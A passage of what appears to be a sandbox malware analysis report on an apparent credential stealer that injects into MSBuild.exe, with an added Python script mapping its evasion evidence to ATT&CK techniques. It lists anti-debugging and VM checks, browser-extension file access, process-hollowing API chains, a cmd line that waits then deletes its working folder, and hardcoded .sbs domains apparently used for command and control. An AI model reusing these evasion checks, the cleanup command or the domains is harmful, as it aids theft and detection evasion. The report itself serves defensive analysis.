Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh 3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_00909ABF FindFirstFileExW, 0_2_00909ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 3_2_0040CD37
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D19ABF FindFirstFileExW, 10_2_00D19ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 3_2_00415142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00410FBA GetSystemInfo,wsprintfA, 3_2_00410FBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2205846539.0000000001196000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2205846539.000000000114C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware-
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001196000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW#
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Process queried: DebugPort
Source: C:\ProgramData\KEGIDHJKKJ.exe Process queried: DebugPort
Source: C:\ProgramData\KEGIDHJKKJ.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_008F7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_008F7922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00418A63 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_00418A63
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_008F2003 mov edi, dword ptr fs:[00000030h] 0_2_008F2003
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_0091E385 mov eax, dword ptr fs:[00000030h] 0_2_0091E385
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_0091E37A mov eax, dword ptr fs:[00000030h] 0_2_0091E37A
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_0091E362 mov eax, dword ptr fs:[00000030h] 0_2_0091E362
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_00935582 mov eax, dword ptr fs:[00000030h] 0_2_00935582
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_0090A64C mov eax, dword ptr fs:[00000030h] 0_2_0090A64C
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_00900F2E mov ecx, dword ptr fs:[00000030h] 0_2_00900F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h] 3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h] 3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h] 3_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004186A9 mov eax, dword ptr fs:[00000030h] 3_2_004186A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004186AA mov eax, dword ptr fs:[00000030h] 3_2_004186AA
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D02003 mov edi, dword ptr fs:[00000030h] 10_2_00D02003
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D1A64C mov eax, dword ptr fs:[00000030h] 10_2_00D1A64C
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D10F2E mov ecx, dword ptr fs:[00000030h] 10_2_00D10F2E
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_0090CC4B GetProcessHeap, 0_2_0090CC4B
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_008F7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_008F7610
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_008F7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_008F7922
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_008F7AAF SetUnhandledExceptionFilter, 0_2_008F7AAF
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_008FDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_008FDA73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041D12A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0041D12A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041DAAC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0041DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0042774E SetUnhandledExceptionFilter, 3_2_0042774E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBDB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6CBDB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBDB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6CBDB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6CD8AC62
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D07610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_00D07610
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D07922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00D07922
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D07AAF SetUnhandledExceptionFilter, 10_2_00D07AAF
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D0DA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00D0DA73
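The evasion evidence above is a flat list that mixes checks the sample actually performs (the sandbox DLL names SBIEDLL.DLL, API_LOG.DLL and DIR_WATCH.DLL, the GetKeyboardLayoutList comparison behind the "country aware" verdict, the Win32_BIOS WMI query, the DebugPort queries and the fs:[30h] PEB reads) with strings that only describe the analysis machine: every VMware and Hyper-V string attributed to Amcache.hve.6.dr comes from the sandbox host's own Amcache hive, captured as a dropped file, and is not a check the sample made. The Python script below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in the report's `Source: <source> <kind>: <detail>` format, tags each hit with an ATT&CK technique and keeps sample evidence apart from environment artifacts. The rule labels and the technique mapping are the editor's choice; the input lines are copied from this section.

```python
import re
from collections import defaultdict

# Report lines copied from the section above (a subset), used as sample input.
SAMPLE_LINES = [
    r"Source: f1r6P3j3g7.exe, MSBuild.exe Binary or memory string: SBIEDLL.DLL",
    r"Source: f1r6P3j3g7.exe, MSBuild.exe Binary or memory string: API_LOG.DLL",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh 3_2_00410DDB",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6984 Thread sleep time: -60000s >= -30000s",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040180D OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 3_2_0040180D",
    r"Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device",
    r"Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter",
    r"Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Process queried: DebugPort",
    r"Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_0091E385 mov eax, dword ptr fs:[00000030h] 0_2_0091E385",
    r"Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_008FDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_008FDA73",
]

# "Source: <source> <kind>: <detail>"; the kind is the first capitalised
# phrase followed by ": " so that paths containing spaces still parse.
LINE_RE = re.compile(r"^Source: (?P<src>.+?) (?P<kind>[A-Z][A-Za-z /]+?): (?P<detail>.*)$")

# (label, ATT&CK technique, pattern applied to the detail part). Labels and
# mapping are the editor's assumption, not report output.
RULES = [
    ("sandbox-dll-names", "T1497.001",
     re.compile(r"(SBIEDLL|API_LOG|DIR_WATCH|PSTOREC|VMCHECK|WPESPY|SNXHK|CMDVRT32|CMDVRT64|AVGHOOKX|AVGHOOKA)\.DLL", re.I)),
    ("vm-vendor-strings", "T1497.001", re.compile(r"VMware|Hyper-V|vmci|VBox|QEMU", re.I)),
    ("wmi-bios-query", "T1497.001", re.compile(r"SELECT \* FROM Win32_BIOS", re.I)),
    ("keyboard-layout-check", "T1614.001", re.compile(r"GetKeyboardLayoutList")),
    ("sleep-delay", "T1497.003", re.compile(r"Thread sleep (time|count)")),
    ("cursor-activity-check", "T1497.002", re.compile(r"GetCursorPos")),
    ("debugport-query", "T1622", re.compile(r"^DebugPort$")),
    ("peb-beingdebugged", "T1622", re.compile(r"fs:\[00000030h\]")),
    ("isdebuggerpresent", "T1622", re.compile(r"\bIsDebuggerPresent\b")),
]


def evidence_origin(src):
    # Amcache.hve.<n>.dr is the analysis VM's own Amcache hive captured as a
    # dropped file; hypervisor strings in it describe the sandbox hardware.
    return "environment" if src.startswith("Amcache.hve") else "sample"


def classify(lines):
    """Map rule label -> list of evidence dicts for every matching report line."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        src, detail = m["src"], m["detail"]
        for label, technique, pat in RULES:
            if pat.search(detail):
                hits[label].append({"technique": technique, "origin": evidence_origin(src),
                                    "src": src, "detail": detail})
    return dict(hits)


def techniques(hits, origin="sample"):
    """Sorted ATT&CK technique ids supported by evidence of the given origin."""
    return sorted({h["technique"] for evs in hits.values() for h in evs if h["origin"] == origin})


def environment_only(hits):
    """Rule labels whose only evidence comes from the analysis environment."""
    return sorted(label for label, evs in hits.items()
                  if all(h["origin"] == "environment" for h in evs))


if __name__ == "__main__":
    h = classify(SAMPLE_LINES)
    print("sample techniques:     ", techniques(h))
    print("environment artifacts: ", environment_only(h))
```

Run on the lines above, the sample-origin techniques are T1497.001, T1497.002, T1497.003, T1614.001 and T1622, while `vm-vendor-strings` is reported as environment-only; an analyst pasting the whole section into this script gets the same split without reading the source column line by line.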

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: f1r6P3j3g7.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\KEGIDHJKKJ.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 3_2_0040F54A
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\KEGIDHJKKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: KEGIDHJKKJ.exe String found in binary or memory: frizzettei.sbs
Source: KEGIDHJKKJ.exe String found in binary or memory: isoplethui.sbs
Source: KEGIDHJKKJ.exe String found in binary or memory: exemplarou.sbs
Source: KEGIDHJKKJ.exe String found in binary or memory: invinjurhey.sbs
Source: KEGIDHJKKJ.exe String found in binary or memory: wickedneatr.sbs
Source: KEGIDHJKKJ.exe String found in binary or memory: exilepolsiy.sbs
Source: KEGIDHJKKJ.exe String found in binary or memory: laddyirekyi.sbs
Source: KEGIDHJKKJ.exe String found in binary or memory: bemuzzeki.sbs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 3_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 3_2_0041257F
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 894008
Source: C:\ProgramData\KEGIDHJKKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\ProgramData\KEGIDHJKKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\ProgramData\KEGIDHJKKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000
Source: C:\ProgramData\KEGIDHJKKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000
Source: C:\ProgramData\KEGIDHJKKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000
Source: C:\ProgramData\KEGIDHJKKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D09008
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\KEGIDHJKKJ.exe "C:\ProgramData\KEGIDHJKKJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGIJDGCAEBFI" & exit
Source: C:\ProgramData\KEGIDHJKKJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_0091E013 cpuid 0_2_0091E013
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_0090C085
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: GetLocaleInfoW, 0_2_0090622B
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free, 0_2_009423DB
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: EnumSystemLocalesW, 0_2_0090C327
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: EnumSystemLocalesW, 0_2_0090C372
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0090C498
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: EnumSystemLocalesW, 0_2_0090C40D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_0094456E
